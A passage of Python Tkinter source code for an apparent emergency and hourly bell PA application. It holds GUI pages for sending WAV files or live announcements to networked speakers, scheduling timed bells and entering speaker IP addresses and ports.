self.s2_button.place(relx=.5, rely=.8, anchor="center")
L1.place(relx=.15, rely=.3, anchor="center")
L2.place(relx=.15, rely=.5, anchor="center")
L3.place(relx=.5, rely=0.03, anchor="center")
L4.place(relx=.04, rely=.70, anchor="w")
L5.place(relx=.60, rely=.3, anchor="center")
L6.place(relx=.60, rely=.5, anchor="center")
L7.place(relx=.42, rely=.24, anchor="center")
L8.place(relx=.67, rely=.24, anchor="center")
self.set_button1.place(relx=.84, rely=.3, anchor="center")
self.set_button2.place(relx=.84, rely=.5, anchor="center")
#set_button3.place(relx=.7, rely=.8, anchor="center")
set_button4.place(x=0, y=0)
#set_button5.place(relx=.3, rely=.8, anchor="center")
#set_button6.place(relx=.5, rely=.8, anchor="center")
E1.place(relx=.42, rely=.3, anchor="center")
E2.place(relx=.42, rely=.5, anchor="center")
E1_1.place(relx=.68, rely=.3, anchor="center")
E1_2.place(relx=.68, rely=.5, anchor="center")
port_input.set(00000)
port_input_1.set(00000)
ip_input.set("")
ip_input_1.set("")
self.s1_on = False
self.s2_on = False
self.both_on = False
self.s1_button['state'] = 'disabled'
self.s2_button['state'] = 'disabled'
self.both_button['state'] = 'disabled'
def selected_serv(self):
x = self.switch_variable.get()
ip1 = ip_input.get()
po1 = port_input.get()
ip2 = ip_input_1.get()
po2 = port_input_1.get()
ip_t1 = 'IP Address 1: '+ip1
po_t1 = 'Port Address 1: '+str(po1)
ip_t2 = 'IP Address 2: '+ip2
po_t2 = 'Port Address 2: '+str(po2)
if (x == 's1'):
bool1.set(True)
bool2.set(False)
bool3.set(False)
_conn1.set(ip_t1)
_conn2.set(po_t1)
_conn3.set('IP Address 2: '+'Not available')
_conn4.set('Port Address 2:'+'Not available')
self.goto_connect()
elif x == 's2':
bool1.set(False)
bool2.set(True)
bool3.set(False)
_conn1.set('Not available')
_conn2.set('Port Address 2:'+'Not available')
_conn3.set(ip_t2)
_conn4.set(po_t2)
self.goto_connect()
elif x == 'both':
bool1.set(False)
bool2.set(False)
bool3.set(True)
_conn1.set(ip_t1)
_conn2.set(po_t1)
_conn3.set(ip_t2)
_conn4.set(po_t2)
self.goto_connect()
def toggle_button_1(self):
i1 = ip_input.get()
p1 = port_input.get()
if (i1 is '') and (p1 is 0):
print("Wrong")
elif p1 is 0:
print("wrong")
elif i1 is '':
print('WRong')
else:
if self.set_button1.config('relief')[-1] == 'sunken':
self.set_button1.config(relief="raised")
self.s1_on = False
self.s1_button['state'] = 'disabled'
self.both_button['state'] = 'disabled'
else:
self.set_button1.config(relief="sunken")
self.s1_on = True
if self.s2_on is True and self.s1_on is True:
self.both_button['state'] = 'normal'
self.s1_button['state'] = 'normal'
def toggle_button_2(self):
i1 = ip_input_1.get()
p1 = port_input_1.get()
if (i1 is '') and (p1 is 0):
print("Wrong")
elif p1 is 0:
print("wrong")
elif i1 is '':
print('WRong')
else:
if self.set_button2.config('relief')[-1] == 'sunken':
self.set_button2.config(relief="raised")
self.s2_on = False
self.s2_button['state'] = 'disabled'
self.both_button['state'] = 'disabled'
else:
self.set_button2.config(relief="sunken")
self.s2_on = True
if self.s2_on is True and self.s1_on is True:
self.both_button['state'] = 'normal'
self.s2_button['state'] = 'normal'
def show(self):
try:
self.deiconify()
return True
except:
return False
def prove(self):
return True
def backOpt(self):
self.withdraw()
self.master1.show()
def goto_connect(self):
self.withdraw()
PageFive(self.master1)
def save_ip(self):
get_ip = open("Address.txt", "w+")
__ip = ip_input.get()
__port = port_input.get()
ip_input.set(__ip)
port_input.set(__port)
if __ip is not None and __port is not None:
add_addr = '{},{}'.format(__ip, __port)
get_ip.write(add_addr)
get_ip.close()
else:
print("Wrong ip")
#Emergency Alarm
class PageTwo(tk.Toplevel):
def __init__(self, master):
self.master2 = master
tk.Toplevel.__init__(self)
self.geometry("500x500")
self.title("Emergency Bell")
#self.state("zoomed")
self.frame = tk.Frame(self)
self.frame.pack(fill="both", expand=True)
self.frame.configure(background="white")
self.frame1 = tk.Frame(self.frame)
self.frame1.configure(background="orange")
self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
self.f = "name.txt"
self.str_1 = tk.StringVar()
self.str_2 = tk.StringVar()
self.str_3 = tk.StringVar()
self.str_4 = tk.StringVar()
self.done_sending_ = tk.StringVar()
b1 = tk.Button(self.frame1, text="Browse", command=self.browse_button, fg='black', bg="white", relief='solid', width=11,
font=('arial', 11, 'bold'))
self.b2 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
bg='white', relief='solid', width=6, height=1, font=('arial', 10, 'bold'))
self.b3 = tk.Button(self.frame1, text='Send', command=self.send_file, fg='black',
bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
self.b4 = tk.Button(self.frame1, text='Stop', command=self.stop_send, fg='black',
bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
self.b5 = tk.Button(self.frame1, text='Resume', command=self.resume_send, fg='black',
bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
self.b6 = tk.Button(self.frame1, text='Pause', command=self.pause_send, fg='black',
bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
b3 = tk.Button(self.frame1, text="Exit", command=self.closeOpt, fg='black', bg="white",
relief='solid',
font=('arial', 10, 'bold'), width='6',
height='1')
l1 = tk.Label(self.frame1, text="EMERGENCY BELL", font=('arial', 20, 'bold'), bg='orange')
l2 = tk.Label(self.frame1, text="Name:", font=('arial', 12, 'bold'), bg='orange')
l3 = tk.Label(self.frame1, text="Length:", font=('arial', 12, 'bold'), bg='orange')
l4 = tk.Label(self.frame1, text="Size:", font=('arial', 12, 'bold'), bg='orange')
l5 = tk.Label(self.frame1, text="Channels:", font=('arial', 12, 'bold'), bg='orange')
l6 = tk.Label(self.frame1, text="Framerate:", font=('arial', 12, 'bold'), bg='orange')
self.progressbar = Progressbar(self.frame1, orient="horizontal", length="350", mode="determinate",variable=progress_var)
l7_ = tk.Label(self.frame1, text="", font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_1)
l8_ = tk.Label(self.frame1, text="", font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_2)
l9_ = tk.Label(self.frame1, text='', font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_3)
l10_ = tk.Label(self.frame1, text='', font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_4)
l11_ = tk.Label(self.frame1, text='0%', font=('arial', 12, 'bold'), bg='orange', textvariable=percentage_)
# l13_ = Label(self, text='Done Sending!', font=('arial', 12, 'bold'), bg='orange', textvariable=None)
l12_ = tk.Label(self.frame1, text='Sending. . .', font=('arial', 12, 'bold'), bg='orange',
textvariable=self.done_sending_)
path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\alarm.gif'
load_img = Image.open(path1)
load_img2 = Image.open(path2)
load_img3 = Image.open(path3)
wd = 70
ht = 70
wd1 = 80
ht1 = 80
img_res2 = load_img2.resize((wd,ht), Image.ANTIALIAS)
img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
img_res3 = load_img3.resize((wd1, ht1), Image.ANTIALIAS)
get_img = ImageTk.PhotoImage(img_res1)
img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
get_img2 = ImageTk.PhotoImage(img_res2)
img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
get_img3 = ImageTk.PhotoImage(img_res3)
img_logo3 = tk.Label(self.frame1, image=get_img3, bg="orange")
img_logo.image = get_img
img_logo.place(relx=0.08, rely=0.18, anchor="w")
img_logo2.image = get_img2
img_logo2.place(relx=0.73, rely=0.17, anchor="w")
img_logo3.image = get_img3
img_logo3.place(relx=0.40, rely=0.17, anchor="w")
b1.place(relx=0.66, rely=0.3, anchor="w")
self.b2.place(x=0, y=0)
self.b3.place(relx=0.08, rely=0.75, anchor="w")
self.b4.place(relx=0.50, rely=0.75, anchor="w")
self.b5.place(relx=0.08, rely=0.85, anchor="w")
self.b6.place(relx=0.50, rely=0.85, anchor="w")
b3.place(x=2, relx=0.88, rely=0)
l1.place(relx=0.5, rely=0.05, anchor="center")
l2.place(relx=0.08, rely=0.3, anchor="w")
l3.place(relx=0.08, rely=0.4, anchor="w")
l4.place(relx=0.08, rely=0.5, anchor="w")
l5.place(relx=0.45, rely=0.4, anchor="w")
l6.place(relx=0.45, rely=0.5, anchor="w")
self.progressbar.place(relx=0.08, rely=0.6, anchor="w")
l7_.place(relx=0.22, rely=0.4, anchor="w")
l8_.place(relx=0.22, rely=0.5, anchor="w")
l9_.place(relx=0.63, rely=0.4, anchor="w")
l10_.place(relx=0.63, rely=0.5, anchor="w")
l11_.place(relx=0.81, rely=0.6, anchor="w")
# l13_.place(x=40, y=200)
l12_.place(relx=0.08, rely=0.66, anchor="w")
self.b4["state"] = "disabled"
self.b5["state"] = "disabled"
self.b6["state"] = "disabled"
percentage_.set("0%")
self.sound_list = {}
_songlist = "songlist.txt"
if os.path.exists(_songlist):
sound = open(_songlist, "r+")
js_song = sound.read()
values = json.loads(js_song)
if values is not None:
self.sound_list = {**self.sound_list, **values}
values = list(self.sound_list.keys())
else:
values = ''
else:
values = ''
self.combo = Combobox(self.frame1, height="10", width="30", values=values)
self.combo.place(relx=0.22, rely=0.3, anchor="w")
self.combo.bind("<<ComboboxSelected>>", self.on_select)
if values is not '' and values is not None:
self.combo.current(0)
self.stop1 = False
self.pause2 = False
self.resume1 = False
self.done__ = False
self.chunks = 1000
# self.ip = '127.0.0.1'
# self.port = 12345
self.ip = ip_input.get()
self.port = port_input.get()
self.client2 = Client2_Send(ip=self.ip, port=self.port)
def on_select(self, event=None):
x = event.widget.get()
print(x)
locs = self.sound_list[x]
self.change_text(locs)
fw = open(self.f, "w+")
fw.write(locs)
fw.close()
def closeOpt(self):
self.master2.quiting()
def backOpt(self):
self.destroy()
self.master2.show()
def sending_frame(self):
def _send_label():
self.done__ = False
while True:
if self.done__:
break
self.done_sending_.set("Sending")
time.sleep(1)
if self.done__:
break
self.done_sending_.set("Sending.")
time.sleep(1)
if self.done__:
break
self.done_sending_.set("Sending. .")
time.sleep(1)
if self.done__:
break
self.done_sending_.set("Sending. . .")
time.sleep(1)
if self.done__:
break
t1 = threading.Thread(target=_send_label, daemon=True)
t1.start()
def send_file(self):
def __progress():
file = open('name.txt', 'r+')
file = file.read()
wf = wave.open(file, 'rb')
size = wf.getnframes()
num_packets = int((size/self.chunks)+1)
self.resume1 = False
self.stop1 = False
self.pause2 = False
self.b2["state"] = "disabled"
self.b3["state"] = "disabled"
self.b4["state"] = "normal"
self.b5["state"] = "disabled"
self.b6["state"] = "normal"
# total = 1023450
# sps = 4098
self.progressbar['maximum'] = num_packets
self.sending_frame()
###----
self.client2.running_all()
###----
self.done__ = True
time.sleep(1)
self.done_sending_.set("Done sending!")
percentage_.set("0%")
self.progressbar.stop()
progress_var.set(0)
self.b2["state"] = "normal"
self.b3["state"] = "normal"
self.b4["state"] = "disabled"
self.b5["state"] = "disabled"
self.b6["state"] = "disabled"
time.sleep(1)
self.done_sending_.set("Select a sound to send")
t1 = threading.Thread(target=__progress, daemon=True)
t1.start()
def resume_send(self):
self.done__ = False
self.resume1 = True
self.client2.waveclient.resume_play()
self.b5["state"] = "disabled"
self.b6["state"] = "normal"
def stop_send(self):
def stop_send_():
self.stop1 = True
self.done__ = True
self.client2.waveclient.stop_play()
time.sleep(1)
self.done_sending_.set("Select a sound to send.")
percentage_.set("0%")
self.progressbar.stop()
self.b2["state"] = "normal"
self.b3["state"] = "normal"
self.b4["state"] = "disabled"
self.b5["state"] = "disabled"
self.b6["state"] = "disabled"
t1 = threading.Thread(target=stop_send_, daemon=True)
t1.start()
def pause_send(self):
def pause_send_():
self.client2.waveclient.pause_play()
self.pause2 = True
self.done__ = True
self.b5["state"] = "normal"
self.b6["state"] = "disabled"
time.sleep(1)
self.done_sending_.set("Sending is paused.")
t1 = threading.Thread(target=pause_send_, daemon=True)
t1.start()
def browse_button(self):
def browse_button_():
filename1 = filedialog.askopenfilename(initialdir="/", title="Choose a file",
filetypes=(("Sound files", ".wav"), ("All files", "*.*")))
name1 = os.path.basename(filename1)
add_name_1 = filename1 # f"Filename: {name1} \nPath: {filename1}"
fw = open(self.f, "w+")
fw.write(add_name_1)
fw.close()
if filename1 is not '' and name1 is not '':
if name1 not in self.sound_list:
self.sound_list[name1] = filename1
self.combo.set(name1)
self.combo['values'] = list(self.sound_list.keys())
self.combo.current()
save_song = open("songlist.txt", "w+")
str_js = json.dumps(self.sound_list)
save_song.write(str_js)
save_song.close()
self.change_text(filename1)
t1 = threading.Thread(target=browse_button_, daemon=True)
t1.start()
def change_text(self, filename1):
def change_text_(filename1):
wf = wave.open(filename1, 'rb')
size = os.path.getsize(filename1)
(source_rate, source_sig) = wav.read(filename1)
duration_seconds = len(source_sig) / float(source_rate)
size = size / 1000
size1 = size / 1000
size1 = round(size1, 1)
size = int(size)
if len(str(size)) >= 6:
size = ''.join(str(size1) + " MB")
else:
size = ''.join(str(size) + " KB")
chn = wf.getnchannels()
fr = wf.getframerate()
fr = ''.join(str(fr) + " Hz")
duration_seconds = "".join(str(int(duration_seconds)) + " sec")
if duration_seconds and size and chn and fr:
self.str_1.set(duration_seconds)
self.str_2.set(size)
self.str_3.set(chn)
self.str_4.set(fr)
t1 = threading.Thread(target=change_text_, args=(filename1,), daemon=True)
t1.start()
#Hourly Bell
class PageThree(tk.Toplevel):
def __init__(self, master):
self.master2 = master
tk.Toplevel.__init__(self)
self.geometry("500x500")
self.title("Emergency Bell")
#self.state("zoomed")
self.start_var = tk.StringVar(value = '')
self.end_var = tk.StringVar(value = '')
self.interval_var = tk.IntVar(value=0)
self.song_var = tk.StringVar()
self.song_invalid = False
vcmd = (self.register(self.onValidate), '%d', '%s', '%S')
self.frame = tk.Frame(self)
self.frame.pack(fill="both", expand=True)
self.frame.configure(background="white")
self.frame1 = tk.Frame(self.frame)
self.frame1.configure(background="orange")
self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
Lh0 = tk.Label(self.frame1, text='HOURLY BELL', font=('arial', 20, 'bold'), bg='orange')
Lh1 = tk.Label(self.frame1, text='Time Start:', font=('arial', 20, 'bold'), bg='orange')
Lh2 = tk.Label(self.frame1, text='Time End :', font=('arial', 20, 'bold'), bg='orange')
Lh3 = tk.Label(self.frame1, text='Interval:', font=('arial', 20, 'bold'), bg='orange')
Lh4 = tk.Label(self.frame1, text='Operation Logs:', font=('arial', 12, 'bold'), bg='orange')
Lh5 = tk.Label(self.frame1, text='- in minutes', font=('arial', 8, 'bold'), bg='orange')
self.Eh1 = tk.Entry(self.frame1, width=14, font=('arial', 12, 'bold'), validate='key', validatecommand= vcmd,bd=5, justify = 'center', textvariable =self.start_var)
self.Eh2 = tk.Entry(self.frame1, width=14, font=('arial', 12, 'bold'), validate='key', validatecommand= vcmd, bd=5, justify = 'center', textvariable =self.end_var)
self.Eh3 = tk.Entry(self.frame1, width=14, font=('arial', 12, 'bold') ,bd=5, justify = 'center', textvariable =self.interval_var)
hbbrowse = tk.Button(self.frame1, text="Browse", command=self.browse_button, fg='black', bg="white", relief='solid', width=10,
font=('arial', 12, 'bold'), height=2)
set_button2 = tk.Button(self.frame1, text='Set', command=self.set_button, fg='black',
bg='white', relief='solid', width=10, height=2,
font=('arial', 12, 'bold'))
self.b1 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
bg='white', relief='solid', width=6, height=1, font=('arial', 10, 'bold'))
self.b2 = tk.Button(self.frame1, text='Delete\nLog', command=self.delete, fg='black',
bg='white', relief='solid', width=5, font=('arial', 8, 'bold'))
self.clock = tk.Label(self.frame1, font=('arial', 10, 'bold'), fg='black', bg='white', width=12)
path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\bell.gif'
load_img = Image.open(path1)
load_img2 = Image.open(path2)
load_img3 = Image.open(path3)
wd = 70
ht = 70
wd1 = 80
ht1 = 80
img_res2 = load_img2.resize((wd, ht), Image.ANTIALIAS)
img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
img_res3 = load_img3.resize((wd, ht), Image.ANTIALIAS)
get_img = ImageTk.PhotoImage(img_res1)
img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
get_img2 = ImageTk.PhotoImage(img_res2)
img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
get_img3 = ImageTk.PhotoImage(img_res3)
img_logo3 = tk.Label(self.frame1, image=get_img3, bg='orange')
img_logo.image = get_img
img_logo2.image = get_img2
img_logo3.image = get_img3
Lh0.place(x=160, y=10)
Lh1.place(relx=0.20, rely=0.35, anchor='w')
Lh2.place(relx=0.20, rely=0.45, anchor='w')
Lh3.place(relx=0.20, rely=0.55, anchor='w')
Lh4.place(relx=0.05, rely=0.75, anchor='w')
Lh5.place(relx=0.20, rely=0.59, anchor='w')
self.Eh1.place(relx=0.55, rely=0.35, anchor='w')
self.Eh2.place(relx=0.55, rely=0.45, anchor='w')
self.Eh3.place(relx=0.55, rely=0.55, anchor='w')
hbbrowse.place(relx=0.25, rely=0.67, anchor='w')
set_button2.place(relx=0.55, rely=0.67, anchor='w')
img_logo.place(relx=0.1, rely=0.18, anchor="w")
img_logo2.place(relx=0.73, rely=0.17, anchor="w")
img_logo3.place(relx=0.42, rely=0.17, anchor="w")
self.b1.place(x=0, y=0)
self.b2.place(relx=0.86, rely=0.85, anchor="w")
self.clock.place(relx=0.5, rely=0.26, anchor='n')
self.car_header = [' Filename ', ' Time Start ', ' Time End ', ' Interval(-min.) ',' Active ']
self.car_list = []
self.pick_sound = {}
if os.path.exists('sound.txt'):
read_sound = open('sound.txt', 'r+')
file0 = read_sound.read()
file0 = json.loads(file0)
else:
file0 = {}
self.pick_sound = {**self.pick_sound, **file0}
self.del_logs = False
self._setup_widgets()
self.show_clk()
ip = ip_input.get()
port = port_input.get()
#ip = '127.0.0.1'
#port = 12345
self.client3 = Client3_Send(ip=ip, port=port)
self.Eh1.bind('<KeyRelease>', self.timemask)
self.Eh2.bind('<KeyRelease>', self.timemask)
def onValidate(self, d, s, S):
if d == "0":
return True
# Allow only digit, ":" and check the length of the string
if ((S == ":" and len(s) != 2 and len(s) != 5 ) or (not S.isdigit() and
S != ":") or (len(s) == 3 and int(S) > 5) or (len(s) == 6 and int(S) > 5) or len(s) > 7):
self.bell()
return False
return True
def timemask(self, event):
s = event.widget
# if delete a char do return ok or delete the char ":" and the previous number
if len(s.get()) == 2 and event.keysym=="BackSpace":
s.delete(len(s.get())-1, tk.END)
if event.keysym=="BackSpace":
return
# check the hour format and add : between hours and minutes
if len(s.get()) == 1 and int(s.get()) > 2:
s.insert(0, "0")
s.insert("end", ":")
elif len(s.get()) == 2 and int(s.get()) < 24:
s.insert(2, ":")
elif len(s.get()) >= 2 and s.get()[2:3] != ":":
self.bell()
s.delete(1, tk.END)
elif len(s.get()) == 5 and int(s.get()[3:5]) < 60:
s.insert(5, ":")
elif len(s.get()) >= 5 and s.get()[5:6] != ":":
self.bell()
s.delete(4, tk.END)
def browse_button(self):
def browse_button_():
filename = filedialog.askopenfilename(initialdir="/", title="Choose a file",
filetypes=(("Sound files", ".wav"), ("All files", "*.*")))
name = os.path.basename(filename)
add_name_ = filename # f"Filename: {name1} \nPath: {filename1}"
fw = open('sound loc.txt', "w+")
fw.write(add_name_)
fw.close()
item_source.set(add_name_)
if filename is not '' and name is not '':
if name not in self.pick_sound:
self.pick_sound[name] = filename
save_sound = open('sound.txt', 'w+')
str_sound = json.dumps(self.pick_sound)
save_sound.write(str_sound)
save_sound.close()
self.song_var.set(name)
t1 = threading.Thread(target=browse_button_, daemon=True)
t1.start()
def set_button(self):
start_time = self.start_var.get()
end_time = self.end_var.get()
interval1 = self.interval_var.get()
interval = int(interval1*60)
active = 'Yes'
song = self.song_var.get()
if song is not None and song !='':
self.song_invalid = False
else: self.song_invalid = True
if not self.song_invalid:
if (start_time != '00:00:00') and (end_time != '00:00:00') and (interval != 0):
song_load_1 = song
if (len(start_time) == 8) and (len(end_time) == 8):
parts = start_time.split(':')
parts_2 = end_time.split(':')
s_time = int(parts[0])*(60*60) + int(parts[1])*60 + int(parts[2])
e_time = int(parts_2[0])*(60*60) + int(parts_2[1])*60 + int(parts_2[2])
ss = int(s_time)
ee = int(e_time)
ii = int(interval)
print(ss, ee, ii)
if (ss < ee) and (ss+ii<=ee):
add = (song_load_1, start_time, end_time, interval1, active)
add_1 = (song_load_1, start_time, end_time, interval, active)
if add not in self.car_list:
jso_n = json.dumps(add_1)
self.start_timing(jso_n)
self.car_list.append(add)
self.tree.insert('', 'end', values=add)
for ix, val in enumerate(add):
col_w = tkFont.Font().measure(val)
if self.tree.column(self.car_header[ix],width=None)<col_w:
self.tree.column(self.car_header[ix], width=col_w)
def start_timing(self, package,):
msg = json.loads(package)
self.msg = msg
audio = msg[0]
st = msg[1]
et = msg[2]
int1 = msg[3]
active_ = msg[4]
if active_ == 'Yes':
self.go_timing(st,et,int1,audio)
def go_timing(self, st, et, ti, src):
new_st = st.split(':')
new_et = et.split(':')
time_st = int(new_st[0])*(60*60) + int(new_st[1])*60 + int(new_st[2])
time_et = int(new_et[0])*(60*60) + int(new_et[1])*60 + int(new_et[2])
get_item = []
for i in range(time_st, time_et, ti):
get_item.append(i)
last = get_item.pop()
st = time.strftime('%H:%M:%S', time.gmtime(last))
for i in range(time_st, time_et, ti):
st = time.strftime('%H:%M:%S', time.gmtime(i))
if i == last:
t1 = threading.Thread(target=self.start_TIME_last, args=(st,et,src,), daemon=True)
t1.start()
else:
t =threading.Thread(target=self.start_TIME, args=(st,src,), daemon=True)
t.start()
def start_TIME(self, time1, src):
while True:
if(time1 == time.strftime('%H:%M:%S')):
self.client3.running_all(src)
break
time.sleep(0.5)
def start_TIME_last(self, time1,t1, src):
while True:
if(time1 == time.strftime('%H:%M:%S')):
self.client3.running_all(src)
break
time.sleep(0.5)
x = self.tree.get_children()
for i in x:
val = self.tree.item(i)['values']
if t1 in val:
val.pop()
add = 'No'
val.append(add)
self.tree.item(i, values=val)
def show_clk(self):
timenow = time.strftime('%H:%M:%S %p')
self.clock['text'] = timenow
#self.clock.config(text=timer)
self.clock.after(1000, self.show_clk)
def backOpt(self):
self.destroy()
self.master2.show()
def _setup_widgets(self):
container = ttk.Frame(self.frame1)
container.place(relx=0.05, rely=0.88, anchor='w')
# create a treeview with dual scrollbars
self.tree = ttk.Treeview(self.frame1,columns=self.car_header, show="headings", height=3)
vsb = ttk.Scrollbar(container ,orient="vertical",
command=self.tree.yview)
hsb = ttk.Scrollbar(container,orient="horizontal",
command=self.tree.xview)
self.tree.configure(yscrollcommand=vsb.set,
xscrollcommand=hsb.set)
self.tree.grid(column=0, row=0, sticky='nsew', in_=container)
self.tree.bind("<<TreeviewSelect>>", self.on_select)
vsb.grid(column=1, row=0, sticky='ns', in_=container)
hsb.grid(column=0, row=1, sticky='ew', in_=container)
container.grid_columnconfigure(0, weight=1)
container.grid_rowconfigure(0, weight=1)
for col in self.car_header:
self.tree.heading(col, text=col.title(),
command=lambda c=col: self.sortby(self.tree, c, 0))
# adjust the column's width to the header string
self.tree.column(col,
width=tkFont.Font().measure(col.title()))
def sortby(self, tree, col, descending):
"""sort tree contents when a column header is clicked on"""
# grab values to sort
data = [(tree.set(child, col), child) \
for child in tree.get_children('')]
# if the data to be sorted is numeric change to float
#data = change_numeric(data)
# now sort the data in place
data.sort(reverse=descending)
for ix, item in enumerate(data):
tree.move(item[1], '', ix)
# switch the heading so it will sort in the opposite direction
tree.heading(col, command=lambda col=col: self.sortby(tree, col, \
int(not descending)))
def on_select(self, event=None):
self.select = event.widget.selection()
if self.select:
self.del_logs = True
def delete(self):
if self.del_logs:
if self.select != None and self.select !='':
for i in self.select:
x = self.tree.item(i)['values']
self.tree.delete(i)
self.del_logs = False
#Live Announcement
class PageFour(tk.Toplevel):
def __init__(self, master):
self.master2 = master
tk.Toplevel.__init__(self)
self.geometry("500x500")
self.title("Emergency Bell")
#self.state("zoomed")
self.frame = tk.Frame(self)
self.frame.pack(fill="both", expand=True)
self.frame.configure(background="white")
self.frame1 = tk.Frame(self.frame)
self.frame1.configure(background="orange")
self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
b1 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
bg='white', relief='solid', width=6, height=1,
font=('arial', 10, 'bold'))
self.b2 = tk.Button(self.frame1,text='Play', command=lambda: self.record_time(0), fg='black',
bg='white', relief='solid', width=15, height=2,
font=('arial', 10, 'bold'))
self.b3 = tk.Button(self.frame1,text='Stop', command=self.stop_button, fg='black',
bg='white', relief='solid', width=15, height=2,
font=('arial', 10, 'bold'))
Lh0 = tk.Label(self.frame1, text='LIVE ANNOUNCEMENT', font=('arial', 20, 'bold'), bg='orange')
Lh1 = tk.Label(self.frame1, text='Time Elapsed:', font=('arial', 20, 'bold'), bg='orange')
self.Lh2 = tk.Label(self.frame1, text='00:00:00', font=('arial', 20, 'bold'), bg='orange')
path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\mic.gif'
load_img = Image.open(path1)
load_img2 = Image.open(path2)
load_img3 = Image.open(path3)
wd = 70
ht = 70
wd1 = 80
ht1 = 80
img_res2 = load_img2.resize((wd, ht), Image.ANTIALIAS)
img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
img_res3 = load_img3 #load_img3.resize((wd, ht), Image.ANTIALIAS)
get_img = ImageTk.PhotoImage(img_res1)
img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
get_img2 = ImageTk.PhotoImage(img_res2)
img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
get_img3 = ImageTk.PhotoImage(img_res3)
img_logo3 = tk.Label(self.frame1, image=get_img3, bg='orange')
img_logo.image = get_img
img_logo2.image = get_img2
img_logo3.image = get_img3
b1.place(x=0, y=0)
self.b2.place(relx=.2, rely=0.6, anchor='w')
self.b3.place(relx=.55, rely=0.6, anchor='w')
Lh0.place(relx=0.50, rely=0.05, anchor='center')
Lh1.place(relx=0.18, rely=0.40, anchor='w')
self.Lh2.place(relx=0.58, rely=0.40, anchor='w')
img_logo.place(relx=0.1, rely=0.18, anchor="w")
img_logo2.place(relx=0.73, rely=0.17, anchor="w")
img_logo3.place(relx=0.35, rely=0.18, anchor="w")
def record_time(self,s):
ip1 = ip_input.get()
port1 = port_input.get()
ip2 = ip_input_1.get()
port2 = port_input_1.get()
self.client = Client_Send(ip=ip1, port=port1, ip2=ip2, port2=port2)
self.client.running_all()
live_run.set(True)
self.record_time2(s)
def record_time2(self, s):
timee = s
if live_run.get():
time_start = time.strftime('%H:%M:%S', time.gmtime(timee))
else:
time_start = time.strftime('%H:%M:%S', time.gmtime(0))
self.b2['state'] ="disabled"
self.Lh2['text'] = time_start
self._job = self.after(1000,self.record_time2, s+1)
def stop_button(self):
self.client.live.stop_playing()
time_start = time.strftime('%H:%M:%S', time.gmtime(0))
self.Lh2['text'] = time_start
self.cancel_()
self.b2['state'] ="normal"
def cancel_(self):
if self._job is not None:
self.after_cancel(self._job)
self._job = None
def backOpt(self):
self.destroy()
self.master2.show()
#Connect Page
class PageFive(tk.Toplevel):
def __init__(self, master):
self.master2 = master
tk.Toplevel.__init__(self)
self.geometry("500x500")
self.title("Emergency Bell")
#self.state("zoomed")
self.frame = tk.Frame(self)
self.frame.pack(fill="both", expand=True)
self.frame.configure(background="white")
self.frame1 = tk.Frame(self.frame)
self.frame1.configure(background="orange")
self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
self.b1 = tk.Button(self.frame1, text='Home', command=self.exit_, fg='black',
bg='white', relief='solid', width=6, height=1,
font=('arial', 10, 'bold'))
Lh0 = tk.Label(self.frame1, text='Wi-Fi Sender', font=('arial', 20, 'bold'), bg='orange')
self.Lh1 = tk.Label(self.frame1, text='', font=('arial', 14, 'bold'), bg='orange', fg='maroon')
self.Lh2 = tk.Label(self.frame1, text='IP Address 1: 192.168.254.115', textvariable=_conn1, font=('arial', 12, 'bold'), bg='orange')
self.Lh3 = tk.Label(self.frame1, text='Port Address 1: 8080', textvariable=_conn2,font=('arial', 12, 'bold'), bg='orange')
self.Lh4 = tk.Label(self.frame1, text='IP Address 2: 192.168.254.115', textvariable=_conn3, font=('arial', 12, 'bold'), bg='orange')
self.Lh5 = tk.Label(self.frame1, text='Port Address 2: 8080', textvariable=_conn4,font=('arial', 12, 'bold'), bg='orange')
self.Lh6 = tk.Label(self.frame1, text='Status:', font=('arial', 12, 'bold'), bg='orange')
self.Lh7 = tk.Label(self.frame1, text='Speaker 1: Connecting' , font=('arial', 12, 'bold'), bg='orange',)
self.Lh8 = tk.Label(self.frame1, text='Speaker 2: Connecting', font=('arial', 12, 'bold'), bg='orange')
path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
load_img = Image.open(path1)
wd1 = 80
ht1 = 80
img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
get_img = ImageTk.PhotoImage(img_res1)
img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
img_logo.image = get_img
self.b1.place(x=0, y=0)
Lh0.place(relx=0.50, rely=0.05, anchor='center')
self.Lh1.place(relx=0.38, rely=0.32, anchor='w')
